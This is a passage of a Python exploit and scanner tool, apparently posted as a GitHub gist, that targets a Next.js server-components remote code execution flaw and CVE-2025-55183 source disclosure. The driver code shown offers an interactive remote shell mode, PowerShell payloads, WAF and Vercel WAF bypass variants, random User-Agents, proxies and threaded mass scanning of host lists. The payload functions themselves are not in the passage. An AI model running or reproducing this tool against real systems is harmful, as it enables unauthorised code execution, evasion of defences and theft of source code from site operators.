help="Proxy URL (e.g., http://127.0.0.1:8080)"
)
parser.add_argument(
"--random-agent",
action="store_true",
help="Use random User-Agent for each request"
)
parser.add_argument(
"--delay",
type=float,
default=0,
help="Delay between requests in seconds"
)
args = parser.parse_args()
if args.no_color or not sys.stdout.isatty():
Colors.RED = ""
Colors.GREEN = ""
Colors.YELLOW = ""
Colors.BLUE = ""
Colors.MAGENTA = ""
Colors.CYAN = ""
Colors.WHITE = ""
Colors.BOLD = ""
Colors.RESET = ""
if not args.quiet:
print_banner()
if args.url:
hosts = [args.url]
else:
hosts = load_hosts(args.list)
if not hosts:
print(colorize("[ERROR] No hosts to scan", Colors.RED))
sys.exit(1)
if args.exploit:
if len(hosts) > 1:
print(colorize("[ERROR] Exploit mode only supports single host (-u)", Colors.RED))
sys.exit(1)
custom_headers = parse_headers(args.headers)
proxies = None
if args.proxy:
proxies = {"http": args.proxy, "https": args.proxy}
interactive_shell(
hosts[0],
args.timeout,
not args.insecure,
proxies=proxies,
windows=args.windows,
waf_bypass=args.waf_bypass,
waf_bypass_size_kb=args.waf_bypass_size,
custom_headers=custom_headers,
random_agent=args.random_agent,
vercel_waf_bypass=args.vercel_waf_bypass,
bypass_variant=args.bypass_variant
)
sys.exit(0)
if args.nextjs_rsc_source_code_disclosure:
custom_headers = parse_headers(args.headers)
proxies = None
if args.proxy:
proxies = {"http": args.proxy, "https": args.proxy}
for host in hosts:
check_cve_2025_55183(host, args.timeout, not args.insecure, proxies=proxies, custom_headers=custom_headers, random_agent=args.random_agent)
sys.exit(0)
paths = None
if args.path_file:
paths = load_paths(args.path_file)
elif args.paths:
paths = []
for path in args.paths:
if not path.startswith("/"):
path = "/" + path
paths.append(path)
timeout = args.timeout
if args.waf_bypass and args.timeout == 10:
timeout = 20
proxies = None
if args.proxy:
proxies = {"http": args.proxy, "https": args.proxy}
if not args.quiet:
console.print(f"[*] Loaded {len(hosts)} host(s) to scan", style="info")
if paths:
console.print(f"[*] Testing {len(paths)} path(s): {', '.join(paths)}", style="info")
console.print(f"[*] Using {args.threads} thread(s)", style="info")
console.print(f"[*] Timeout: {timeout}s", style="info")
if args.safe_check:
console.print("[*] Using safe side-channel check", style="info")
else:
console.print("[*] Using RCE PoC check", style="info")
if args.windows:
console.print("[*] Windows mode enabled (PowerShell payload)", style="info")
if args.waf_bypass:
console.print(f"[*] WAF bypass enabled ({args.waf_bypass_size}KB junk data)", style="info")
if args.vercel_waf_bypass:
console.print("[*] Vercel WAF bypass mode enabled", style="info")
if args.insecure:
console.print("[!] SSL verification disabled", style="warning")
if args.proxy:
console.print(f"[*] Using Proxy: {args.proxy}", style="info")
if args.random_agent:
console.print("[*] Random User-Agent enabled", style="info")
if args.delay > 0:
console.print(f"[*] Delay {args.delay}s between requests", style="info")
console.print()
results = []
vulnerable_count = 0
potential_bypass_count = 0
error_count = 0
verify_ssl = not args.insecure
custom_headers = parse_headers(args.headers)
if args.insecure:
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
if len(hosts) == 1:
variants_to_test = []
if args.bypass_variant == 'all':
variants_to_test = list(range(1, 103))
elif args.bypass_variant:
try:
variants_to_test = [int(args.bypass_variant)]
except ValueError:
console.print(f"[error] Invalid variant: {args.bypass_variant}[/error]", style="error")
sys.exit(1)
else:
variants_to_test = [None]
for v in variants_to_test:
if v is not None and not args.quiet:
console.print(f"[*] Testing Variant: {v}", style="info")
result = check_vulnerability(hosts[0], timeout, verify_ssl, custom_headers=custom_headers, safe_check=args.safe_check, windows=args.windows, waf_bypass=args.waf_bypass, waf_bypass_size_kb=args.waf_bypass_size, vercel_waf_bypass=args.vercel_waf_bypass, bypass_variant=v, paths=paths, proxies=proxies, delay=args.delay, random_agent=args.random_agent)
results.append(result)
if result["vulnerable"]:
vulnerable_count += 1
if not args.quiet:
print_result(result, args.verbose)
elif result.get("potential_bypass"):
potential_bypass_count += 1
if not args.quiet:
console.print(f"[yellow][POTENTIAL BYPASS / SERVER ERROR] {hosts[0]} - Status: {result['status_code']}[/yellow]")
console.print(" [!] WAF might have been bypassed but payload failed execution.")
if args.verbose:
snippet = result.get("response", "")
m = re.search(r'digest":"(\d+)"', snippet)
if m:
console.print(f" Digest: {m.group(1)}")
else:
console.print(f" Response snippet:\n {snippet[:200]}")
elif result.get("error"):
error_count += 1
if not args.quiet:
print_result(result, args.verbose)
else:
if not args.quiet:
print_result(result, args.verbose)
else:
with ThreadPoolExecutor(max_workers=args.threads) as executor:
futures = {
executor.submit(check_vulnerability, host, timeout, verify_ssl, custom_headers=custom_headers, safe_check=args.safe_check, windows=args.windows, waf_bypass=args.waf_bypass, waf_bypass_size_kb=args.waf_bypass_size, vercel_waf_bypass=args.vercel_waf_bypass, bypass_variant=args.bypass_variant, paths=paths, proxies=proxies, delay=args.delay, random_agent=args.random_agent, follow_redirects=True): host
for host in hosts
}
with Progress(
SpinnerColumn(),
TextColumn("[progress.description]{task.description}"),
BarColumn(),
TaskProgressColumn(),
console=console,
transient=True,
disable=args.quiet
) as progress:
task = progress.add_task("[cyan]Scanning...", total=len(hosts))
for future in as_completed(futures):
result = future.result()
results.append(result)
if result["vulnerable"]:
vulnerable_count += 1
print_result(result, args.verbose)
elif result["error"]:
error_count += 1
if not args.quiet and args.verbose:
print_result(result, args.verbose)
elif not args.quiet and args.verbose:
print_result(result, args.verbose)
progress.update(task, advance=1)
if not args.quiet:
console.print()
table = Table(title="Scan Summary", show_header=True, header_style="bold magenta")
table.add_column("Category", style="cyan")
table.add_column("Count", justify="right")
table.add_row("Total Scanned", str(len(results)))
table.add_row("Vulnerable", f"[bold red]{vulnerable_count}[/bold red]" if vulnerable_count > 0 else "0")
table.add_row("Potential Bypass", f"[yellow]{potential_bypass_count}[/yellow]" if potential_bypass_count > 0 else "0")
table.add_row("Not Vulnerable", str(len(results) - vulnerable_count - potential_bypass_count - error_count))
table.add_row("Errors", str(error_count))
console.print(table)
console.print()
if args.output:
save_results(results, args.output, file_format=args.format, vulnerable_only=not args.all_results)
if vulnerable_count > 0:
sys.exit(1)
sys.exit(0)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
console.print(f"\n[warning][!] Scan interrupted by user[/warning]")
sys.exit(0)
except Exception as e:
console.print(f"\n[error][ERROR] An unexpected error occurred: {e}[/error]")
sys.exit(1)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment